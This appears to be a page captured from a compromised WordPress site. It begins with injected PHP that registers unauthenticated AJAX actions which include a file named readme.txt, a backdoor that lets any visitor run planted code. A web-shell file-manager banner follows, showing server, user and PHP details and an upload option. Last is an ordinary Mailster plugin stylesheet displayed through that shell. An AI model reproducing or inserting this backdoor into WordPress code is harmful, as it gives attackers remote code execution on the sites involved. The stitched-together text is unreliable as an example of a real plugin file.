if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/mailster/assets/css/select2.css
.select2-container--mailster {
	display: inline-block;
	min-width: 100%;
}
.select2-container--mailster li.select2-selection__choice {
	display: inline-block;
	height: 2em;
	line-height: 2em;
	position: relative;
	font-size: 1em;
}
.select2-container--mailster li.select2-selection__choice {
	margin-right: 4px;
	padding: 0 1em 0 2.5em;
	background: #2bb3e7;
	color: #fff;
	text-decoration: none;
	border-radius: 6px;
	display: block;
	float: left;
}
.select2-container--mailster li.select2-selection__choice input {
	background: none;
	border: 0;
	color: #fff;
	font-weight: bold;
	font-size: 12px;
}
.select2-container--mailster li.select2-selection__choice a {
	opacity: 0;
	color: #fff;
}
.select2-container--mailster li.select2-selection__choice:hover a {
	opacity: 1;
}
.select2-container--mailster li.select2-selection__choice:after {
	content: '';
	position: absolute;
	top: 50%;
	left: 1em;
	float: left;
	width: 0.5em;
	height: 0.5em;
	border-radius: 50%;
	background: #fff;
	box-shadow: -1px -1px 2px #004977;
	transform: translateY(-50%);
}
.select2-container--mailster
	li.select2-selection__choice
	.select2-selection__choice__remove {
	float: right;
	margin-left: 0.5em;
	font-size: 1.2em;
	visibility: hidden;
	background: none;
	border: 0;
	color: #fff;
	padding: 0.2em 0;
}
.select2-container--mailster
	li.select2-selection__choice:hover
	.select2-selection__choice__remove {
	visibility: visible;
}
.select2-container--mailster .select2-selection__rendered {
	box-sizing: border-box;
	border-radius: 0;
	padding-left: 2px;
}
.select2-container.select2-container--mailster .select2-search--inline {
	border-radius: 4px;
	box-shadow: 0 0 0 transparent;
	border: 1px solid #7e8993;
	background-color: #fff;
	color: #32373c;
	display: block;
	float: none;
	clear: both;
}
.select2-container.select2-container--mailster
	.select2-search--inline
	.select2-search__field {
	border: 0;
	font-size: 1em;
	min-height: 28px;
	max-width: 99%;
}
.select2-container.select2-container--mailster
	.select2-search--inline
	.select2-search__field:focus {
	border: 0;
	box-shadow: none;
}
body > .select2-container.select2-container--mailster.select2-container--open {
	margin-top: -2px;
}